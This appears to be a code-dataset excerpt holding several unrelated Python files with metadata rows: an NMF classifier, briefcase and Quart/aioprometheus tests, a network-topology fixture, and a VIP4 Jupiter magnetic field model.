                self.B = np.multiply(np.divide(self.B,eps+ self.L @ np.transpose(self.S)), \
                    np.divide(np.multiply(self.L, self.Y), eps+ np.multiply(self.L,self.B @ self.S)) @ np.transpose(self.S))
                self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
                    self.lam * np.transpose(self.B) @ \
                    self.L)),2 * np.transpose(self.A) \
                    @ np.multiply(self.W,self.X) + self.lam * np.transpose(self.B) @ \
                    np.divide(np.multiply(self.L,self.Y), eps+ np.multiply(self.L,self.B @ self.S)))
                if saveerrs:
                    reconerrs[i] = la.norm(np.multiply(self.W,self.X) - np.multiply(self.W,self.A @ self.S), 'fro')
                    classerrs[i] = self.kldiv()
                    errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
                    classaccs[i] = self.accuracy()
            print("Completed I-SSNMF for semi-supervised learning with missing data.")
            if saveerrs:
                return [errs,reconerrs,classerrs,classaccs]
    def accuracy(self,**kwargs):
        '''
        Compute accuracy of semi-supervised model (2) or (3) above.

        Classification is by argmax over each column of BS versus the argmax of
        the corresponding column of Y.

        Returns
        -------
        acc : float_
            Fraction of correctly classified data points (computed with Y, B, S).

        Raises
        ------
        Exception
            If no label matrix Y was provided at construction.
        '''
        if self.Y is None:
            raise Exception('Label matrix Y not provided: model is not semi-supervised.')
        if self.L is None:
            #count number of data points which are correctly classified
            numdata = np.shape(self.Y)[1]
            numacc = 0
            Yhat = self.B @ self.S
            for i in range(numdata):
                true_max = np.argmax(self.Y[:,i])
                approx_max = np.argmax(Yhat[:,i])
                if true_max == approx_max:
                    numacc = numacc + 1
            #return fraction of correctly classified data points
            acc = numacc/numdata
            return acc
        if self.L is not None:
            #count number of data points which are correctly classified;
            #columns whose masked label column is all zeros (no observed label)
            #are excluded from the denominator
            numdata = np.shape(self.Y)[1]
            num_labels = numdata
            numacc = 0
            Yhat = np.multiply(self.L, self.B @ self.S)
            for i in range(numdata):
                true_max = np.argmax(np.multiply(self.L,self.Y)[:,i])
                approx_max = np.argmax(Yhat[:,i])
                if (true_max == approx_max and np.multiply(self.L,self.Y)[true_max,i] != 0):
                    numacc = numacc + 1
                if (true_max == approx_max and np.multiply(self.L,self.Y)[true_max,i] == 0):
                    num_labels = num_labels - 1
                #return fraction of correctly classified data points
            acc = numacc/num_labels
            return acc
    def kldiv(self,**kwargs):
        '''
        Compute I-divergence between Y and BS of semi-supervised model (most naturally (3)).

        Parameters
        ----------
        eps : float_, optional
            Epsilon value to prevent division by zero (default is 1e-10).

        Returns
        -------
        kldiv : float_
            I-divergence between Y and BS.

        Raises
        ------
        Exception
            If no label matrix Y was provided at construction.
        '''
        eps = kwargs.get('eps', 1e-10)
        if self.Y is None:
            raise Exception('Label matrix Y not provided: model is not semi-supervised.')
        if self.L is None:
            #compute divergence
            Yhat = self.B @ self.S
            div = np.multiply(self.Y, np.log(np.divide(self.Y+eps, Yhat+eps))) - self.Y + Yhat
            kldiv = np.sum(np.sum(div))
            return kldiv
        if self.L is not None:
            #compute divergence when there is missing labels (unobserved entries masked out by L)
            Yhat = np.multiply(self.L,self.B @ self.S)
            div = np.multiply(np.multiply(self.L, self.Y), np.log(np.divide(np.multiply(self.L, self.Y)+eps, Yhat+eps))) \
                -np.multiply(self.L,self.Y) + Yhat
            kldiv = np.sum(np.sum(div))
            return kldiv
| 47.261824
| 141
| 0.542621
| 3,680
| 27,979
| 4.113043
| 0.06087
| 0.037328
| 0.071353
| 0.038055
| 0.889271
| 0.866477
| 0.832254
| 0.805893
| 0.773256
| 0.739892
| 0
| 0.009357
| 0.335394
| 27,979
| 591
| 142
| 47.341794
| 0.804625
| 0.297759
| 0
| 0.70979
| 0
| 0
| 0.081799
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020979
| false
| 0
| 0.006993
| 0
| 0.08042
| 0.034965
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17a0b7cd9a6d3d0cb3e7fc83398aaa40dc70e707
| 3,396
|
py
|
Python
|
tests/commands/create/test_create_app.py
|
paulproteus/briefcase
|
9d00dc9300cb00ef5dcd766e3a625a94b0462e51
|
[
"BSD-3-Clause"
] | null | null | null |
tests/commands/create/test_create_app.py
|
paulproteus/briefcase
|
9d00dc9300cb00ef5dcd766e3a625a94b0462e51
|
[
"BSD-3-Clause"
] | null | null | null |
tests/commands/create/test_create_app.py
|
paulproteus/briefcase
|
9d00dc9300cb00ef5dcd766e3a625a94b0462e51
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest import mock
def test_create_app(tracking_create_command):
    "If the app doesn't already exist, it will be created"
    app = tracking_create_command.apps['first']
    tracking_create_command.create_app(app)

    # The full creation pipeline ran, in order.
    assert tracking_create_command.actions == [
        (step, app)
        for step in ('generate', 'support', 'dependencies', 'code', 'resources')
    ]

    # New app content has been created
    assert (tracking_create_command.platform_path / 'first.bundle' / 'new').exists()
def test_create_existing_app_overwrite(tracking_create_command):
    "An existing app can be overwritten if requested"
    # Simulate the user answering yes when asked.
    tracking_create_command.input = mock.MagicMock(return_value='y')

    # Pre-populate the bundle location with old template output.
    bundle_path = tracking_create_command.platform_path / 'first.bundle'
    bundle_path.mkdir(parents=True)
    with (bundle_path / 'original').open('w') as f:
        f.write('original template!')

    app = tracking_create_command.apps['first']
    tracking_create_command.create_app(app)

    # The full creation pipeline ran, in order.
    assert tracking_create_command.actions == [
        (step, app)
        for step in ('generate', 'support', 'dependencies', 'code', 'resources')
    ]

    # Old content was removed; new content was generated in its place.
    assert not (bundle_path / 'original').exists()
    assert (bundle_path / 'new').exists()
def test_create_existing_app_no_overwrite(tracking_create_command):
    "If you say no, the existing app won't be overwritten"
    # Simulate the user answering no when asked.
    tracking_create_command.input = mock.MagicMock(return_value='n')

    # Pre-populate the bundle location with old template output.
    bundle_path = tracking_create_command.platform_path / 'first.bundle'
    bundle_path.mkdir(parents=True)
    with (bundle_path / 'original').open('w') as f:
        f.write('original template!')

    tracking_create_command.create_app(tracking_create_command.apps['first'])

    # Nothing was done; the old content is untouched and no new content exists.
    assert tracking_create_command.actions == []
    assert (bundle_path / 'original').exists()
    assert not (bundle_path / 'new').exists()
def test_create_existing_app_no_overwrite_default(tracking_create_command):
    "By default, the existing app won't be overwritten"
    # Simulate the user just pressing return (empty answer) when asked.
    tracking_create_command.input = mock.MagicMock(return_value='')

    # Pre-populate the bundle location with old template output.
    bundle_path = tracking_create_command.platform_path / 'first.bundle'
    bundle_path.mkdir(parents=True)
    with (bundle_path / 'original').open('w') as f:
        f.write('original template!')

    tracking_create_command.create_app(tracking_create_command.apps['first'])

    # Nothing was done; the old content is untouched and no new content exists.
    assert tracking_create_command.actions == []
    assert (bundle_path / 'original').exists()
    assert not (bundle_path / 'new').exists()
| 37.318681
| 84
| 0.715842
| 431
| 3,396
| 5.387471
| 0.199536
| 0.198966
| 0.29845
| 0.150732
| 0.854866
| 0.841947
| 0.841947
| 0.787252
| 0.738157
| 0.738157
| 0
| 0
| 0.173439
| 3,396
| 90
| 85
| 37.733333
| 0.827218
| 0.202297
| 0
| 0.666667
| 0
| 0
| 0.178337
| 0
| 0
| 0
| 0
| 0
| 0.215686
| 1
| 0.078431
| false
| 0
| 0.019608
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd6665d843367358b18f01273f4a236fd07e4e0d
| 46
|
py
|
Python
|
e2e/server_unreachable/some_test.py
|
testandconquer/pytest-conquer
|
da600c7f5bcd06aa62c5cca9b75370bf1a6ebf05
|
[
"MIT"
] | null | null | null |
e2e/server_unreachable/some_test.py
|
testandconquer/pytest-conquer
|
da600c7f5bcd06aa62c5cca9b75370bf1a6ebf05
|
[
"MIT"
] | 5
|
2018-12-27T02:52:01.000Z
|
2019-01-02T01:52:55.000Z
|
e2e/server_unreachable/some_test.py
|
testandconquer/pytest-conquer
|
da600c7f5bcd06aa62c5cca9b75370bf1a6ebf05
|
[
"MIT"
] | null | null | null |
import time
def test_a():
    """Dummy test case: idle for one second to simulate real test work."""
    pause_seconds = 1
    time.sleep(pause_seconds)
| 7.666667
| 17
| 0.630435
| 8
| 46
| 3.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.23913
| 46
| 5
| 18
| 9.2
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bd97486db17525bb3c04503418deaca33bc13446
| 9,887
|
py
|
Python
|
tests/test_quart.py
|
JacobHenner/aioprometheus
|
d0528e832a1cdbc3503942b1b0c8925a43007500
|
[
"MIT"
] | 104
|
2016-11-01T04:43:23.000Z
|
2022-03-09T18:15:05.000Z
|
tests/test_quart.py
|
JacobHenner/aioprometheus
|
d0528e832a1cdbc3503942b1b0c8925a43007500
|
[
"MIT"
] | 35
|
2017-04-05T07:52:15.000Z
|
2022-03-13T02:29:50.000Z
|
tests/test_quart.py
|
JacobHenner/aioprometheus
|
d0528e832a1cdbc3503942b1b0c8925a43007500
|
[
"MIT"
] | 18
|
2017-02-08T07:48:26.000Z
|
2022-03-01T01:16:29.000Z
|
import logging
import sys
import unittest
import asynctest
from aioprometheus import REGISTRY, Counter, MetricsMiddleware, formats, render
try:
from quart import Quart, request
from aioprometheus.asgi.quart import metrics
have_quart = True
except ImportError:
have_quart = False
@unittest.skipUnless(have_quart, "Quart library is not available")
class TestQuartRender(asynctest.TestCase):
    """Test exposing Prometheus metrics from within a Quart app"""

    def tearDown(self):
        # Metrics register globally; reset so each test starts from an
        # empty registry and counter values are predictable.
        REGISTRY.clear()

    async def test_render_in_quart_app(self):
        """check render usage in Quart app"""
        app = Quart(__name__)
        app.events_counter = Counter("events", "Number of events.")

        @app.route("/")
        async def index():
            app.events_counter.inc({"path": "/"})
            return "hello"

        @app.route("/metrics")
        async def handle_metrics():
            # render() negotiates the output format from the accept headers.
            content, http_headers = render(REGISTRY, request.headers.getlist("accept"))
            return content, http_headers

        # The test client also starts the web service
        test_client = app.test_client()

        # Access root to increment metric counter
        response = await test_client.get("/")
        self.assertEqual(response.status_code, 200)

        # Get default format
        response = await test_client.get("/metrics", headers={"accept": "*/*"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        # payload = await response.get_data()

        # Get text format
        response = await test_client.get("/metrics", headers={"accept": "text/plain;"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )

        # Get binary format
        response = await test_client.get(
            "/metrics",
            headers={"accept": formats.binary.BINARY_CONTENT_TYPE},
        )
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.binary.BINARY_CONTENT_TYPE,
            response.headers.get("content-type"),
        )

    async def test_asgi_middleware(self):
        """check ASGI middleware usage in Quart app"""
        app = Quart(__name__)
        app.events_counter = Counter("events", "Number of events.")

        @app.route("/")
        async def index():
            app.events_counter.inc({"path": "/"})
            return "hello"

        # Add a route that always generates an exception
        @app.route("/boom")
        async def hello():
            raise Exception("Boom")

        # Wrap the app so request/response/status-code counters are recorded.
        app.asgi_app = MetricsMiddleware(app.asgi_app)
        app.add_url_rule("/metrics", "metrics", metrics, methods=["GET"])

        # The test client also starts the web service
        test_client = app.test_client()

        # Access root to increment metric counter
        response = await test_client.get("/")
        self.assertEqual(response.status_code, 200)

        # Get default format
        response = await test_client.get("/metrics", headers={"accept": "*/*"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        payload = await response.get_data()
        content = payload.decode("utf-8")
        # Check content
        self.assertIn('events{path="/"} 1', content)
        self.assertIn('requests_total_counter{method="GET",path="/"} 1', content)
        self.assertIn(
            'status_codes_counter{method="GET",path="/",status_code="200"} 1', content
        )
        self.assertIn('responses_total_counter{method="GET",path="/"} 1', content)

        # Access it again to confirm default metrics get incremented
        response = await test_client.get("/")
        self.assertEqual(response.status_code, 200)

        # Get text format
        response = await test_client.get("/metrics", headers={"accept": "text/plain;"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        payload = await response.get_data()
        content = payload.decode("utf-8")
        # Check content
        self.assertIn('events{path="/"} 2', content)
        self.assertIn('requests_total_counter{method="GET",path="/"} 2', content)
        self.assertIn(
            'status_codes_counter{method="GET",path="/",status_code="200"} 2', content
        )
        self.assertIn('responses_total_counter{method="GET",path="/"} 2', content)

        # Confirm no exception have been observed so far.
        self.assertNotIn("exceptions_total_counter{", content)

        # Access boom route to trigger exception metric update.
        # Silence the stderr output log generated by Quart when it captures
        # the exception.
        with self.assertLogs("quart.app", logging.ERROR):
            with asynctest.mock.patch.object(sys.stderr, "write") as mock_stderr:
                response = await test_client.get("/boom")
                self.assertEqual(response.status_code, 500)

        response = await test_client.get("/metrics", headers={"accept": "*/*"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        payload = await response.get_data()
        content = payload.decode("utf-8")
        # Check exception counter was NOT incremented due to Quart not
        # propagating exceptions out to the ASGI layer.
        self.assertNotIn(
            'exceptions_total_counter{method="GET",path="/boom"} 1', content
        )
        self.assertIn(
            'status_codes_counter{method="GET",path="/boom",status_code="500"} 1',
            content,
        )

    async def test_asgi_middleware_group_status_codes_enabled(self):
        """check ASGI middleware group status codes usage in FastAPI app"""
        app = Quart(__name__)
        app.events_counter = Counter("events", "Number of events.")

        @app.route("/")
        async def index():
            app.events_counter.inc({"path": "/"})
            return "hello"

        # Add a route that always generates an exception
        @app.route("/boom")
        async def hello():
            raise Exception("Boom")

        # group_status_codes=True buckets status codes into classes
        # ("2xx", "5xx", ...) instead of exact codes.
        app.asgi_app = MetricsMiddleware(app.asgi_app, group_status_codes=True)
        app.add_url_rule("/metrics", "metrics", metrics, methods=["GET"])

        # The test client also starts the web service
        test_client = app.test_client()

        # Access root to increment metric counter
        response = await test_client.get("/")
        self.assertEqual(response.status_code, 200)

        # Get default format
        response = await test_client.get("/metrics", headers={"accept": "*/*"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        payload = await response.get_data()
        content = payload.decode("utf-8")
        # Check content
        self.assertIn('events{path="/"} 1', content)
        self.assertIn('requests_total_counter{method="GET",path="/"} 1', content)
        self.assertIn(
            'status_codes_counter{method="GET",path="/",status_code="2xx"} 1', content
        )
        self.assertIn('responses_total_counter{method="GET",path="/"} 1', content)

        # Access it again to confirm default metrics get incremented
        response = await test_client.get("/")
        self.assertEqual(response.status_code, 200)

        # Get text format
        response = await test_client.get("/metrics", headers={"accept": "text/plain;"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        payload = await response.get_data()
        content = payload.decode("utf-8")
        # Check content
        self.assertIn('events{path="/"} 2', content)
        self.assertIn('requests_total_counter{method="GET",path="/"} 2', content)
        self.assertIn(
            'status_codes_counter{method="GET",path="/",status_code="2xx"} 2', content
        )
        self.assertIn('responses_total_counter{method="GET",path="/"} 2', content)

        # Confirm no exception have been observed so far.
        self.assertNotIn("exceptions_total_counter{", content)

        # Access boom route to trigger exception metric update.
        # Silence the stderr output log generated by Quart when it captures
        # the exception.
        with self.assertLogs("quart.app", logging.ERROR):
            with asynctest.mock.patch.object(sys.stderr, "write") as mock_stderr:
                response = await test_client.get("/boom")
                self.assertEqual(response.status_code, 500)

        response = await test_client.get("/metrics", headers={"accept": "*/*"})
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            formats.text.TEXT_CONTENT_TYPE,
            response.headers.get("content-type"),
        )
        payload = await response.get_data()
        content = payload.decode("utf-8")
        # Check exception counter was NOT incremented due to Quart not
        # propagating exceptions out to the ASGI layer.
        self.assertNotIn(
            'exceptions_total_counter{method="GET",path="/boom"} 1', content
        )
        self.assertIn(
            'status_codes_counter{method="GET",path="/boom",status_code="5xx"} 1',
            content,
        )
| 36.618519
| 87
| 0.616668
| 1,108
| 9,887
| 5.362816
| 0.134477
| 0.054527
| 0.057556
| 0.061932
| 0.888253
| 0.864692
| 0.864692
| 0.85796
| 0.85796
| 0.839953
| 0
| 0.011797
| 0.262668
| 9,887
| 269
| 88
| 36.754647
| 0.803292
| 0.133104
| 0
| 0.711111
| 0
| 0
| 0.184801
| 0.10618
| 0
| 0
| 0
| 0
| 0.272222
| 1
| 0.005556
| false
| 0
| 0.044444
| 0
| 0.077778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da08638632f2975d301b02c5cca682f314d45e1d
| 3,441
|
py
|
Python
|
cn/bvt/assignment-3/topo5.py
|
adamacosta/bvt
|
17f8e94105b346ddad185900df08269702e94391
|
[
"MIT"
] | null | null | null |
cn/bvt/assignment-3/topo5.py
|
adamacosta/bvt
|
17f8e94105b346ddad185900df08269702e94391
|
[
"MIT"
] | null | null | null |
cn/bvt/assignment-3/topo5.py
|
adamacosta/bvt
|
17f8e94105b346ddad185900df08269702e94391
|
[
"MIT"
] | null | null | null |
# a Star topology centered on Z: eight arms of length 3 (C, F, I, L, M, P,
# S, V are the hub-adjacent nodes) radiating from hub Z.
#           D     G     J
#            \    |    /
#             E   H   K
#              \  |  /
#               F I L
#                \|/
# A --- B --- C - Z - M --- N --- O
#                /|\
#               P S V
#              /  |  \
#             Q   T   W
#            /    |    \
#           R     U     X
#
# Adjacency list: node -> list of directly connected neighbours
# (undirected: each edge appears in both endpoints' lists).
topo = { 'A' : ['B'],
         'B' : ['A', 'C'],
         'C' : ['B', 'Z'],
         'D' : ['E'],
         'E' : ['D', 'F'],
         'F' : ['E', 'Z'],
         'G' : ['H'],
         'H' : ['G', 'I'],
         'I' : ['H', 'Z'],
         'J' : ['K'],
         'K' : ['J', 'L'],
         'L' : ['K', 'Z'],
         'M' : ['Z', 'N'],
         'N' : ['M', 'O'],
         'O' : ['N'],
         'P' : ['Z', 'Q'],
         'Q' : ['P', 'R'],
         'R' : ['Q'],
         'S' : ['Z', 'T'],
         'T' : ['S', 'U'],
         'U' : ['T'],
         'V' : ['Z', 'W'],
         'W' : ['V', 'X'],
         'X' : ['W'],
         'Z' : ['C', 'F', 'I', 'L', 'M', 'P', 'S', 'V']}

# Expected all-pairs shortest-path table: one row per source node, formatted
# 'SRC:DST<hops>,...' with the 25 rows concatenated into a single string with
# no separator between rows — presumably matched verbatim by the assignment's
# grader; verify the exact format against the assignment spec.
ans = \
'A:A0,B1,C2,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'B:A1,B0,C1,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'C:A2,B1,C0,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'D:A6,B5,C4,D0,E1,F2,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'E:A5,B4,C3,D1,E0,F1,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'F:A4,B3,C2,D2,E1,F0,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'G:A6,B5,C4,D6,E5,F4,G0,H1,I2,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'H:A5,B4,C3,D5,E4,F3,G1,H0,I1,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'I:A4,B3,C2,D4,E3,F2,G2,H1,I0,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'J:A6,B5,C4,D6,E5,F4,G6,H5,I4,J0,K1,L2,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'K:A5,B4,C3,D5,E4,F3,G5,H4,I3,J1,K0,L1,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'L:A4,B3,C2,D4,E3,F2,G4,H3,I2,J2,K1,L0,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'M:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M0,N1,O2,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'N:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M1,N0,O1,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'O:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M2,N1,O0,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'P:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P0,Q1,R2,S2,T3,U4,V2,W3,X4,Z1' + \
'Q:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P1,Q0,R1,S3,T4,U5,V3,W4,X5,Z2' + \
'R:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P2,Q1,R0,S4,T5,U6,V4,W5,X6,Z3' + \
'S:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S0,T1,U2,V2,W3,X4,Z1' + \
'T:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S1,T0,U1,V3,W4,X5,Z2' + \
'U:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S2,T1,U0,V4,W5,X6,Z3' + \
'V:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V0,W1,X2,Z1' + \
'W:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V1,W0,X1,Z2' + \
'X:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V2,W1,X0,Z3' + \
'Z:A3,B2,C1,D3,E2,F1,G3,H2,I1,J3,K2,L1,M1,N2,O3,P1,Q2,R3,S1,T2,U3,V1,W2,X3,Z0'
| 47.136986
| 82
| 0.408021
| 756
| 3,441
| 1.857143
| 0.236772
| 0.019943
| 0.029915
| 0.039886
| 0.717949
| 0.717949
| 0.692308
| 0.662393
| 0.662393
| 0.623932
| 0
| 0.251408
| 0.277536
| 3,441
| 73
| 83
| 47.136986
| 0.313355
| 0.190061
| 0
| 0
| 0
| 0.490196
| 0.713304
| 0.686913
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
da310f299c75d14dc54551cf69badd8a06c426a9
| 2,642
|
py
|
Python
|
vip4model/ModelCart.py
|
mattkjames7/vip4model
|
63f1fd0a566f2adcf93cdd424f5155fc62336ec3
|
[
"MIT"
] | 1
|
2021-09-07T11:44:20.000Z
|
2021-09-07T11:44:20.000Z
|
vip4model/ModelCart.py
|
mattkjames7/vip4model
|
63f1fd0a566f2adcf93cdd424f5155fc62336ec3
|
[
"MIT"
] | null | null | null |
vip4model/ModelCart.py
|
mattkjames7/vip4model
|
63f1fd0a566f2adcf93cdd424f5155fc62336ec3
|
[
"MIT"
] | null | null | null |
import numpy as np
from .Model import Model,ModelScalar
from ._SphHarm import _SphHarm,_SphHarmScalarCart
def ModelCart(x, y, z, MaxDeg=4):
    '''
    Evaluate the VIP4 magnetic field model (Connerney et al. 1998) at a
    Cartesian position. The model uses right-handed System III coordinates
    (I think).

    Inputs
    ======
    x : float
        x-coordinate in Rj, R-H System III.
    y : float
        y-coordinate in Rj, R-H System III.
    z : float
        z-coordinate in Rj, R-H System III.

    Returns
    =======
    Bx : float
        x component of magnetic field, nT.
    By : float
        y component of magnetic field, nT.
    Bz : float
        z component of magnetic field, nT.

    Please cite:
    Connerney, J. E. P., Acuña, M. H., Ness, N. F., and Satoh, T. (1998),
    New models of Jupiter's magnetic field constrained by the Io flux
    tube footprint, J. Geophys. Res., 103( A6), 11929– 11939,
    doi:10.1029/97JA03726.
    '''
    # Spherical polar coordinates of the input position; phi is wrapped
    # into [0, 2*pi).
    r = np.sqrt(x**2 + y**2 + z**2)
    theta = np.arccos(z/r)
    phi = (np.arctan2(y, x) + (2*np.pi)) % (2*np.pi)

    # Evaluate the model in spherical coordinates.
    Br, Bt, Bp = Model(r, theta, phi, MaxDeg)

    # Rotate the field vector back to Cartesian components
    # (hopefully correctly...).
    sint, cost = np.sin(theta), np.cos(theta)
    sinp, cosp = np.sin(phi), np.cos(phi)
    Bx = Br*sint*cosp + Bt*cost*cosp - Bp*sinp
    By = Br*sint*sinp + Bt*cost*sinp + Bp*cosp
    Bz = Br*cost - Bt*sint
    return Bx, By, Bz
def ModelCartScalar(x, y, z, MaxDeg=4):
    '''
    Evaluate the scalar variant of the VIP4 magnetic field model at a
    Cartesian position. The model uses right-handed System III coordinates
    (I think).

    Inputs
    ======
    x : float
        x-coordinate in Rj, R-H System III.
    y : float
        y-coordinate in Rj, R-H System III.
    z : float
        z-coordinate in Rj, R-H System III.

    Returns
    =======
    Bx : float
        x component of magnetic field, nT.
    By : float
        y component of magnetic field, nT.
    Bz : float
        z component of magnetic field, nT.

    If using the VIP4 model, please cite the following paper:
    Connerney, J. E. P., Acuña, M. H., Ness, N. F., and Satoh, T. (1998),
    New models of Jupiter's magnetic field constrained by the Io flux
    tube footprint, J. Geophys. Res., 103( A6), 11929– 11939,
    doi:10.1029/97JA03726.
    '''
    # Spherical polar coordinates of the input position; phi is wrapped
    # into [0, 2*pi).
    r = np.sqrt(x**2 + y**2 + z**2)
    theta = np.arccos(z/r)
    phi = (np.arctan2(y, x) + (2*np.pi)) % (2*np.pi)

    # Evaluate the scalar model in spherical coordinates.
    Br, Bt, Bp = ModelScalar(r, theta, phi, MaxDeg)

    # Rotate the field vector back to Cartesian components
    # (hopefully correctly...).
    sint, cost = np.sin(theta), np.cos(theta)
    sinp, cosp = np.sin(phi), np.cos(phi)
    Bx = Br*sint*cosp + Bt*cost*cosp - Bp*sinp
    By = Br*sint*sinp + Bt*cost*sinp + Bp*cosp
    Bz = Br*cost - Bt*sint
    return Bx, By, Bz
def ModelTest(x, y, z, MaxDeg=4):
    '''Evaluate the scalar Cartesian spherical-harmonic routine directly.'''
    field = _SphHarmScalarCart(x, y, z, MaxDeg)
    return field
| 23.175439
| 71
| 0.652536
| 458
| 2,642
| 3.759825
| 0.248908
| 0.075494
| 0.04878
| 0.052265
| 0.852497
| 0.84669
| 0.84669
| 0.84669
| 0.84669
| 0.809524
| 0
| 0.041011
| 0.206283
| 2,642
| 113
| 72
| 23.380531
| 0.779208
| 0.632097
| 0
| 0.709677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.096774
| 0.032258
| 0.290323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da37afa1ca208c5cbbe4afdc3395e64ac8c1d7c9
| 1,044
|
py
|
Python
|
dev/tools/leveleditor/pandac/PandaModules.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
